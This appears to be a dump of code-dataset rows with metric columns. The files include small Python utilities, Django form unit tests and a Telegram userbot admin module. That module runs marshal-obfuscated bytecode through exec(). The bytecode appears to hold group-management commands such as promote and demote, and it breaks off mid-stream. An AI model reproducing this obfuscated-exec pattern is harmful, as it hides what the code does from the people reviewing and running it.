| 0.029692
| 0.033934
| 0.837443
| 0.82644
| 0.818443
| 0.813097
| 0.80775
| 0.805541
| 0
| 0.195736
| 0.196975
| 40,132
| 873
| 105
| 45.970218
| 0.506532
| 0.114422
| 0
| 0.717391
| 0
| 0
| 0.12713
| 0.025887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031884
| false
| 0
| 0.010145
| 0
| 0.044928
| 0.007246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a5801c718236d84035c0ddf26eeb9e5f8f5dd59
| 47
|
py
|
Python
|
snakeeyes/blueprints/bet/__init__.py
|
MDRCS/software-as-service
|
a34ab152ada280c4b3630f5f38fcd33f75903d5e
|
[
"MIT"
] | null | null | null |
snakeeyes/blueprints/bet/__init__.py
|
MDRCS/software-as-service
|
a34ab152ada280c4b3630f5f38fcd33f75903d5e
|
[
"MIT"
] | 1
|
2020-04-07T06:27:23.000Z
|
2020-04-07T06:27:23.000Z
|
snakeeyes/blueprints/bet/__init__.py
|
MDRCS/software-as-service
|
a34ab152ada280c4b3630f5f38fcd33f75903d5e
|
[
"MIT"
] | 1
|
2020-05-02T13:51:52.000Z
|
2020-05-02T13:51:52.000Z
|
from snakeeyes.blueprints.bet.views import bet
| 23.5
| 46
| 0.851064
| 7
| 47
| 5.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
1a68007423554ddc13f9f05b84740b8ead8c9572
| 282
|
py
|
Python
|
zabbix_libvirt/errors.py
|
CCI-MOC/zabbix-kvm
|
7e31af29478e053a00ace89a5e2e201535a2f279
|
[
"Apache-2.0"
] | null | null | null |
zabbix_libvirt/errors.py
|
CCI-MOC/zabbix-kvm
|
7e31af29478e053a00ace89a5e2e201535a2f279
|
[
"Apache-2.0"
] | null | null | null |
zabbix_libvirt/errors.py
|
CCI-MOC/zabbix-kvm
|
7e31af29478e053a00ace89a5e2e201535a2f279
|
[
"Apache-2.0"
] | null | null | null |
"""Exceptions"""
class LibvirtConnectionError(Exception):
    """Raised when something goes wrong inside the LibvirtConnection class."""
class DomainNotFoundError(Exception):
    """Raised when a requested libvirt domain cannot be found.

    The original docstring was copy-pasted from LibvirtConnectionError and
    described the wrong class; corrected to match this exception's name.
    """
    pass
| 23.5
| 81
| 0.748227
| 29
| 282
| 7.275862
| 0.517241
| 0.132701
| 0.151659
| 0.227488
| 0.7109
| 0.7109
| 0.7109
| 0.7109
| 0.7109
| 0.7109
| 0
| 0
| 0.166667
| 282
| 11
| 82
| 25.636364
| 0.897872
| 0.546099
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
1a84ec1c212c6078ecd82fa0f8ccb9f632b274f9
| 63
|
py
|
Python
|
src/utils/uuid.py
|
0x7FFFFF/asoul-remark
|
09e02a0dce63fe5a426bde8c23e9be8a07d9201a
|
[
"MIT"
] | null | null | null |
src/utils/uuid.py
|
0x7FFFFF/asoul-remark
|
09e02a0dce63fe5a426bde8c23e9be8a07d9201a
|
[
"MIT"
] | 1
|
2021-11-20T14:59:20.000Z
|
2021-11-20T14:59:20.000Z
|
src/utils/uuid.py
|
0x7FFFFF/asoul-mark
|
09e02a0dce63fe5a426bde8c23e9be8a07d9201a
|
[
"MIT"
] | null | null | null |
import uuid
def generate_uuid():
    """Return a fresh random UUID (version 4) as a 32-character hex string."""
    new_id = uuid.uuid4()
    return new_id.hex
| 10.5
| 27
| 0.698413
| 9
| 63
| 4.777778
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.190476
| 63
| 5
| 28
| 12.6
| 0.823529
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
1ac1a4667b1ddf53ab4cfe98469d5ecad70a5f7b
| 32
|
py
|
Python
|
yaddi-yaddi-yadda-yeet.py
|
Davidwan98/yaddi-yaddi-yadda-yeet
|
2ded448ba75b2389d3eb496cc4c416fa45dac248
|
[
"MIT"
] | null | null | null |
yaddi-yaddi-yadda-yeet.py
|
Davidwan98/yaddi-yaddi-yadda-yeet
|
2ded448ba75b2389d3eb496cc4c416fa45dac248
|
[
"MIT"
] | null | null | null |
yaddi-yaddi-yadda-yeet.py
|
Davidwan98/yaddi-yaddi-yadda-yeet
|
2ded448ba75b2389d3eb496cc4c416fa45dac248
|
[
"MIT"
] | null | null | null |
# Script entry point: prints the repository's eponymous catchphrase to stdout.
print("yaddi-yaddi-yadda-yeet")
| 16
| 31
| 0.75
| 5
| 32
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 32
| 1
| 32
| 32
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0.6875
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
46dd28cc32c415376aeebccaf11b60fb92b2f572
| 13,293
|
py
|
Python
|
code/glucocheck/homepage/tests/test_unit_tests/test_forms.py
|
kmcgreg5/Glucocheck
|
4ab4ada7f967ae41c1241c94523d14e693e05dd4
|
[
"FSFAP"
] | null | null | null |
code/glucocheck/homepage/tests/test_unit_tests/test_forms.py
|
kmcgreg5/Glucocheck
|
4ab4ada7f967ae41c1241c94523d14e693e05dd4
|
[
"FSFAP"
] | null | null | null |
code/glucocheck/homepage/tests/test_unit_tests/test_forms.py
|
kmcgreg5/Glucocheck
|
4ab4ada7f967ae41c1241c94523d14e693e05dd4
|
[
"FSFAP"
] | null | null | null |
from homepage.tests.test_unit_tests.classes import UnitTestForm
from homepage.forms import LoginForm, EmailInputForm, ResetPasswordForm, SignupForm, UserProfileForm
from django.contrib.auth.models import User
from datetime import date
class TestLoginForm(UnitTestForm):
    '''Unit tests for the login form against a clean test database.

    Public methods:
    setUpTestData -- creates the fixture users
    test_correct_login -- form validates with correct credentials
    test_incorrect_login -- form rejects a wrong password
    test_unathenticated_user -- form rejects an inactive (unauthenticated) user
    '''

    @classmethod
    def setUpTestData(cls):
        '''Create one active and one inactive user for the tests below.'''
        User.objects.create_user(username='someUser', password='somePassword')
        User.objects.create_user(username='unAuthUser', password='somePassword', is_active=False)

    def test_correct_login(self):
        '''A form populated with valid credentials validates cleanly.'''
        form = LoginForm(data={'username': 'someUser', 'password': 'somePassword'})
        self.assertTrue(form.is_valid())

    def test_incorrect_login(self):
        '''A wrong password produces exactly one form-level error with the expected message.'''
        form = LoginForm(data={'username': 'someUser', 'password': 'wrongPassword'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['__all__'][0].message
        self.assertTrue(message == "Your username OR password is incorrect" and error_count == 1)

    def test_unathenticated_user(self):
        '''Credentials of an inactive user produce exactly one form-level error.'''
        form = LoginForm(data={'username': 'unAuthUser', 'password': 'somePassword'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['__all__'][0].message
        self.assertTrue(message == "Your account is not authenticated, please click the link in your email" and error_count == 1)
class TestEmailInputForm(UnitTestForm):
    '''Unit tests for the email input form against a clean test database.

    Public methods:
    setUpTestData -- creates the fixture user
    test_correct_email -- form validates with a registered email
    test_wrong_email -- form rejects an unregistered email
    test_bad_format_email -- form rejects a malformed email
    '''

    @classmethod
    def setUpTestData(cls):
        '''Create a single user whose email the tests look up.'''
        User.objects.create_user(username='someUser', password='somePassword', email='email@gmail.com')

    def test_correct_email(self):
        '''An email belonging to an existing user validates cleanly.'''
        form = EmailInputForm(data={'email': 'email@gmail.com'})
        self.assertTrue(form.is_valid())

    def test_wrong_email(self):
        '''An email not tied to any user produces exactly one field error.'''
        form = EmailInputForm(data={'email': 'wrongEmail@gmail.com'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['email'][0].message
        self.assertTrue(message == "This email is not associated with a user" and error_count == 1)

    def test_bad_format_email(self):
        '''A malformed email string produces exactly one field error.'''
        form = EmailInputForm(data={'email': 'notAnEmail'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['email'][0].message
        self.assertTrue(message == "Enter a valid email address." and error_count == 1)
class TestResetPasswordForm(UnitTestForm):
    '''Unit tests for the reset password form against a clean test database.

    Public methods:
    test_correct_passwords -- form validates with matching, secure passwords
    test_mismatching_passwords -- form rejects mismatching passwords
    test_insecure_password -- form rejects a password lacking complexity
    '''

    def test_correct_passwords(self):
        '''Matching passwords meeting the complexity rules validate cleanly.'''
        form = ResetPasswordForm(data={'password1': 'somePassword1', 'password2': 'somePassword1'})
        self.assertTrue(form.is_valid())

    def test_mismatching_passwords(self):
        '''Mismatching passwords produce exactly one form-level error.'''
        form = ResetPasswordForm(data={'password1': 'somePassword1', 'password2': 'anotherPassword1'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['__all__'][0].message
        self.assertTrue(message == "The two password fields didn’t match." and error_count == 1)

    def test_insecure_password(self):
        '''A password without an uppercase letter and digit produces one error.

        Passwords are insecure if they lack at least 1 lowercase letter,
        1 uppercase letter, and 1 number.
        '''
        form = ResetPasswordForm(data={'password1': 'somepassword', 'password2': 'somepassword'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['__all__'][0].message
        self.assertTrue(message == 'Your password must be at least 6 letters long and contain at least one uppercase letter, one lowercase letter, and one digit' and error_count == 1)
class TestSignupForm(UnitTestForm):
    '''Unit tests for the signup form against a clean test database.

    Public methods:
    setUpTestData -- creates the fixture user
    test_correct_input -- form validates with fresh, consistent input
    test_incorrect_username -- form rejects an already-taken username
    test_incorrect_email -- form rejects an already-registered email
    test_bad_format_email -- form rejects a malformed email
    test_mismatching_passwords -- form rejects mismatching passwords
    test_insecure_password -- form rejects a password lacking complexity
    '''

    @classmethod
    def setUpTestData(cls):
        '''Create the user whose username/email the duplicate tests collide with.'''
        User.objects.create_user(username='wrongUser', email='wrong@gmail.com', password='somePassword')

    def test_correct_input(self):
        '''Fresh username/email with matching secure passwords validates cleanly.'''
        form = SignupForm(data={'username': 'username', 'email': 'test@gmail.com', 'password1': 'testPassword1', 'password2': 'testPassword1'})
        self.assertTrue(form.is_valid())

    def test_incorrect_username(self):
        '''A username that already exists produces exactly one field error.'''
        form = SignupForm(data={'username': 'wrongUser', 'email': 'test@gmail.com', 'password1': 'testPassword1', 'password2': 'testPassword1'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['username'][0].message
        self.assertTrue(message == "A user with that username already exists." and error_count == 1)

    def test_incorrect_email(self):
        '''An email that already exists produces exactly one field error.'''
        form = SignupForm(data={'username': 'username', 'email': 'wrong@gmail.com', 'password1': 'testPassword1', 'password2': 'testPassword1'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['email'][0].message
        self.assertTrue(message == 'A user with that email already exists' and error_count == 1)

    def test_bad_format_email(self):
        '''A malformed email string produces exactly one field error.'''
        form = SignupForm(data={'username': 'username', 'email': 'notAnEmail', 'password1': 'testPassword1', 'password2': 'testPassword1'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['email'][0].message
        self.assertTrue(message == "Enter a valid email address." and error_count == 1)

    def test_mismatching_passwords(self):
        '''Mismatching passwords produce exactly one error on password2.'''
        form = SignupForm(data={'username': 'username', 'email': 'test@gmail.com', 'password1': 'somePassword1', 'password2': 'anotherPassword1'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['password2'][0].message
        self.assertTrue(message == "The two password fields didn’t match." and error_count == 1)

    def test_insecure_password(self):
        '''A password without a digit produces exactly one form-level error.

        Passwords are insecure if they lack at least 1 lowercase letter,
        1 uppercase letter, and 1 number.
        '''
        form = SignupForm(data={'username': 'username', 'email': 'test@gmail.com', 'password1': 'insecurePassword', 'password2': 'insecurePassword'})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['__all__'][0].message
        self.assertTrue(message == 'Your password must be at least 6 letters long and contain at least one uppercase letter, one lowercase letter, and one digit' and error_count == 1)
class TestUserProfileForm(UnitTestForm):
    '''Unit tests for the user profile form against a clean test database.

    Public methods:
    test_correct_birth_date -- form validates for an adult (over 18) birth date
    test_incorrect_birth_date -- form rejects a minor's (under 18) birth date
    '''

    def test_correct_birth_date(self):
        '''A birth date 19 years in the past validates cleanly.'''
        adult_birth_date = date.today().replace(year=date.today().year - 19)
        form = UserProfileForm(data={'birth_date': adult_birth_date, 'state': 'New Jersey', 'signup_confirmation': True})
        self.assertTrue(form.is_valid())

    def test_incorrect_birth_date(self):
        '''A birth date 17 years in the past produces exactly one field error.'''
        minor_birth_date = date.today().replace(year=date.today().year - 17)
        form = UserProfileForm(data={'birth_date': minor_birth_date, 'state': 'New Jersey', 'signup_confirmation': True})
        error_count = self._get_num_errors(form)
        message = form.errors.as_data()['birth_date'][0].message
        self.assertTrue(message == 'Must be at least 18 years old to register' and error_count == 1)
| 49.051661
| 185
| 0.692319
| 1,610
| 13,293
| 5.543478
| 0.108696
| 0.036303
| 0.04
| 0.049412
| 0.834398
| 0.805154
| 0.764818
| 0.738824
| 0.727507
| 0.682577
| 0
| 0.007616
| 0.219664
| 13,293
| 271
| 186
| 49.051661
| 0.852791
| 0.378019
| 0
| 0.387755
| 0
| 0.020408
| 0.2318
| 0
| 0
| 0
| 0
| 0
| 0.173469
| 1
| 0.204082
| false
| 0.377551
| 0.040816
| 0
| 0.295918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
203d3fa99634362921ef4101bc4c8522e24f6faf
| 59,630
|
py
|
Python
|
userbot/modules/admin.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/admin.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/admin.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00@\x00\x00\x00s\x84\x03\x00\x00d\x00Z\x00d\x01d\x02l\x01m\x02Z\x02\x01\x00d\x01d\x03l\x03m\x04Z\x04\x01\x00d\x01d\x04l\x01Z\x01d\x01d\x04l\x05Z\x05d\x01d\x04l\x06Z\x06d\x01d\x04l\x07Z\x07d\x01d\x04l\x08Z\x08d\x01d\x04l\tm\n\x02\x00\x01\x00m\x0b\x02\x00\x01\x00m\x0cZ\r\x01\x00d\x01d\x05l\x0em\x0fZ\x0fm\x10Z\x10\x01\x00d\x01d\x06l\x11m\x12Z\x12\x01\x00d\x01d\x07l\x13m\x14Z\x14m\x15Z\x15m\x16Z\x16m\x17Z\x17m\x18Z\x18\x01\x00d\x01d\x08l\x19m\x1aZ\x1am\x1bZ\x1b\x01\x00d\x01d\tl\x1cm\x1dZ\x1dm\x1eZ\x1em\x1fZ\x1f\x01\x00d\x01d\nl m!Z!\x01\x00d\x01d\x0bl"m#Z#m$Z$m%Z%m&Z&m\'Z\'m(Z(m)Z)\x01\x00d\x01d\x0cl*m+Z+m,Z,m-Z-m.Z.\x01\x00d\x01d\rl/m0Z0m1Z1\x01\x00d\x01d\x0el2m3Z3\x01\x00d\x0fZ4d\x10Z5d\x11Z6d\x12Z7d\x13Z8d\x14Z9d\x15Z:d\x16Z;e&d\x04d\x17d\x17d\x17d\x17d\x17d\x17d\x17d\x17d\x18\x8d\tZ<e&d\x04d\x04d\x04d\x04d\x04d\x04d\x04d\x04d\x19\x8d\x08Z=e&d\x04d\x17d\x1a\x8d\x02Z>e&d\x04d\x1bd\x1a\x8d\x02Z?e3d\x17d\x1cd\x1d\x8d\x02d\x1ed\x1f\x84\x00\x83\x01Z@e3d\x17d 
d\x1d\x8d\x02d!d"\x84\x00\x83\x01ZAe3d\x17d#d\x1d\x8d\x02d$d%\x84\x00\x83\x01ZBe3d\x17d&d\x1d\x8d\x02d\'d(\x84\x00\x83\x01ZCe3d\x17d)d\x1d\x8d\x02d*d+\x84\x00\x83\x01ZDe3d\x17d,d\x1d\x8d\x02d-d.\x84\x00\x83\x01ZEe3d\x17d/d\x1d\x8d\x02d0d1\x84\x00\x83\x01ZFe3d\x17d2\x8d\x01d3d4\x84\x00\x83\x01ZGe3d\x17d5d\x1d\x8d\x02d6d7\x84\x00\x83\x01ZHe3d\x17d8d\x1d\x8d\x02d9d:\x84\x00\x83\x01ZIe3d\x17d;d\x1bd<\x8d\x03d=d>\x84\x00\x83\x01ZJe3d\x17d?d\x1d\x8d\x02d@dA\x84\x00\x83\x01ZKe3d\x17dBd\x1d\x8d\x02dCdD\x84\x00\x83\x01ZLe3d\x17dEd\x1d\x8d\x02dFdG\x84\x00\x83\x01ZMe3d\x17dHd\x1d\x8d\x02dIdJ\x84\x00\x83\x01ZNdKdL\x84\x00ZOdMdN\x84\x00ZPe3d\x17dOd\x1d\x8d\x02dPdQ\x84\x00\x83\x01ZQdRdS\x84\x00ZRdTdU\x84\x00ZSe3d\x17dVd\x1d\x8d\x02dWdX\x84\x00\x83\x01ZTe3d\x17dYd\x1d\x8d\x02dZd[\x84\x00\x83\x01ZUe3d\x17d\\d\x1d\x8d\x02d]d^\x84\x00\x83\x01ZVe3d\x17d_d\x1d\x8d\x02d`d^\x84\x00\x83\x01ZVe3d\x17dad\x1d\x8d\x02dbdc\x84\x00\x83\x01ZWe3d\x17ddd\x1d\x8d\x02dedf\x84\x00\x83\x01ZXe3d\x17dgd\x1d\x8d\x02dhd^\x84\x00\x83\x01ZVe-\xa0Ydidji\x01\xa1\x01\x01\x00d\x04S\x00)kz+\nUserbot module to help you manage a group\n\xe9\x00\x00\x00\x00)\x01\xda\x05sleep)\x01\xda\x06removeN)\x02\xda\x06events\xda\x05utils)\x01\xda\x08is_admin)\x05\xda\x0fBadRequestError\xda\x16ChatAdminRequiredError\xda\x17ImageProcessFailedError\xda\x17PhotoCropSizeSmallError\xda\x15UserAdminInvalidError)\x02\xda\x12UserIdInvalidError\xda\x13MessageTooLongError)\x03\xda\x10EditAdminRequest\xda\x11EditBannedRequest\xda\x10EditPhotoRequest)\x01\xda\x1aUpdatePinnedMessageRequest)\x07\xda\x0bPeerChannel\xda\x19ChannelParticipantsAdmins\xda\x0fChatAdminRights\xda\x10ChatBannedRights\xda\x18MessageEntityMentionName\xda\x11MessageMediaPhoto\xda\x17ChannelParticipantsBots)\x04\xda\x06BOTLOG\xda\rBOTLOG_CHATID\xda\x08CMD_HELP\xda\x03bot)\x02\xda\x05types\xda\tfunctions)\x01\xda\x08registerz\x18`The image is too small`z$`Failure while processing the image`z\x14`I am not an admin!`z&`I don\'t have sufficient permissions!`z\x1a`Running 
on Non-SQL mode!`z\x16`Chat Picture Changed`z^`Some issue with updating the pic,``maybe coz I\'m not an admin,``or don\'t have enough rights.`z\x13`Invalid Extension`T)\t\xda\nuntil_date\xda\rview_messages\xda\rsend_messages\xda\nsend_media\xda\rsend_stickers\xda\tsend_gifs\xda\nsend_games\xda\x0bsend_inline\xda\x0bembed_links\xa9\x08r \x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00r(\x00\x00\x00)\x02r \x00\x00\x00r"\x00\x00\x00Fz\n^.setgpic$)\x02\xda\x08outgoing\xda\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\xc3\x00\x00\x00s\\\x01\x00\x00|\x00j\x00s\x1a|\x00\xa0\x01d\x01\xa1\x01I\x00d\x02H\x00\x01\x00d\x02S\x00|\x00\xa0\x02\xa1\x00I\x00d\x02H\x00}\x01|\x00\xa0\x03\xa1\x00I\x00d\x02H\x00}\x02|\x02j\x04}\x03|\x02j\x05}\x04d\x02}\x05|\x03sb|\x04sb|\x00\xa0\x01t\x06\xa1\x01I\x00d\x02H\x00\x01\x00d\x02S\x00|\x01r\xcc|\x01j\x07r\xcct\x08|\x01j\x07t\t\x83\x02r\x90|\x00j\nj\x0b|\x01j\x0cd\x03\x8d\x01I\x00d\x02H\x00}\x05n<d\x04|\x01j\x07j\rj\x0e\xa0\x0fd\x05\xa1\x01k\x06r\xbc|\x00j\n\xa0\x10|\x01j\x07j\r\xa1\x01I\x00d\x02H\x00}\x05n\x10|\x00\xa0\x01t\x11\xa1\x01I\x00d\x02H\x00\x01\x00|\x05\x90\x01rXz:|\x00\xa0\nt\x12|\x00j\x13|\x00j\n\xa0\x14|\x05\xa1\x01I\x00d\x02H\x00\x83\x02\xa1\x01I\x00d\x02H\x00\x01\x00|\x00\xa0\x01t\x15\xa1\x01I\x00d\x02H\x00\x01\x00W\x00nJ\x04\x00t\x16k\n\x90\x01r2\x01\x00\x01\x00\x01\x00|\x00\xa0\x01t\x17\xa1\x01I\x00d\x02H\x00\x01\x00Y\x00n&\x04\x00t\x18k\n\x90\x01rV\x01\x00\x01\x00\x01\x00|\x00\xa0\x01t\x19\xa1\x01I\x00d\x02H\x00\x01\x00Y\x00n\x02X\x00d\x02S\x00)\x06z6 For .setgpic command, changes the picture of a group z `I don\'t think this is a 
group.`N)\x01\xda\x07messageZ\x05image\xfa\x01/)\x1aZ\x08is_group\xda\x04edit\xda\x11get_reply_message\xda\x08get_chat\xda\x0cadmin_rights\xda\x07creator\xda\x08NO_ADMIN\xda\x05media\xda\nisinstancer\x17\x00\x00\x00\xda\x06clientZ\x0edownload_media\xda\x05photoZ\x08documentZ\tmime_type\xda\x05splitZ\rdownload_file\xda\rINVALID_MEDIAr\x10\x00\x00\x00\xda\x07chat_idZ\x0bupload_file\xda\x0fCHAT_PP_CHANGEDr\n\x00\x00\x00\xda\x0bPP_TOO_SMOLr\t\x00\x00\x00\xda\x08PP_ERROR)\x06Z\x04gpicZ\x08replymsg\xda\x04chat\xda\x05adminr2\x00\x00\x00r7\x00\x00\x00\xa9\x00r@\x00\x00\x00\xda\x00\xda\x0fset_group_photoQ\x00\x00\x00s:\x00\x00\x00\x00\x03\x06\x01\x10\x01\x04\x01\x0e\x01\x0e\x01\x06\x01\x06\x01\x04\x02\x08\x01\x10\x01\x04\x02\n\x01\x0c\x01\x18\x01\x14\x01\x18\x02\x10\x02\x06\x01\x02\x01\x04\x01\x06\x01\n\xff\x08\xff\n\x03\x14\x02\x10\x01\x14\x01\x10\x01rB\x00\x00\x00z\x14^.promote(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x1a\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00t\x05d\x02d\x03d\x02d\x03d\x03d\x03d\x04\x8d\x06}\x04|\x00\xa0\x03d\x05\xa1\x01I\x00d\x01H\x00\x01\x00t\x06|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x05}\x06|\x06std\x06}\x06|\x05rzn\x04d\x01S\x00z2|\x00\xa0\x07t\x08|\x00j\t|\x05j\n|\x04|\x06\x83\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xd6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x0c\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\r\x90\x01r\x16|\x00j\x07\xa0\x0et\x0fd\x08|\x05j\x10\x9b\x00d\t|\x05j\n\x9b\x00d\n|\x00j\x11j\x12\x9b\x00d\x0b|\x00j\t\x9b\x00d\x0c\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\rz: For .promote command, promotes the replied/tagged person 
NFT\xa9\x06Z\nadd_admins\xda\x0cinvite_users\xda\x0bchange_infoZ\tban_usersZ\x0fdelete_messages\xda\x0cpin_messagesz\x0e`Promoting...`Z\rAdministratorz\x18`Promoted Successfully!`z\x10#PROMOTE\nUSER: [\xfa\x0f](tg://user?id=\xfa\x08)\nCHAT: \xfa\x02(`\xfa\x02`))\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00r\x14\x00\x00\x00\xda\x13get_user_from_eventr6\x00\x00\x00r\x0e\x00\x00\x00r:\x00\x00\x00\xda\x02idr\x07\x00\x00\x00\xda\x07NO_PERMr\x19\x00\x00\x00\xda\x0csend_messager\x1a\x00\x00\x00\xda\nfirst_namer>\x00\x00\x00\xda\x05title)\x07Z\x05promtr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\nnew_rights\xda\x04user\xda\x04rankr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x07promotev\x00\x00\x00sB\x00\x00\x00\x00\x04\x0e\x02\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x06\x07\x10\x01\x12\x01\x04\x01\x04\x01\x04\x01\x02\x02\x04\x03\x02\x01\x04\x01\x10\xff\n\x02\x14\x04\x0e\x01\x10\x01\x08\x03\x06\x01\x06\x01\x02\x00&\xffrS\x00\x00\x00z\x13^.demote(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x1a\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00d\x03}\x04t\x05|\x00\x83\x01I\x00d\x01H\x00}\x05|\x05d\x04\x19\x00}\x05|\x05rfn\x04d\x01S\x00t\x06d\x01d\x01d\x01d\x01d\x01d\x01d\x05\x8d\x06}\x06z"|\x00\xa0\x07t\x08|\x00j\t|\x05j\n|\x06|\x04\x83\x04\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xc6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x0c\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00\x01\x00t\r\x90\x01r\x16|\x00j\x07\xa0\x0et\x0fd\x07|\x05j\x10\x9b\x00d\x08|\x05j\n\x9b\x00d\t|\x00j\x11j\x12\x9b\x00d\n|\x00j\t\x9b\x00d\x0b\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0cz8 For .demote command, demotes the replied/tagged person 
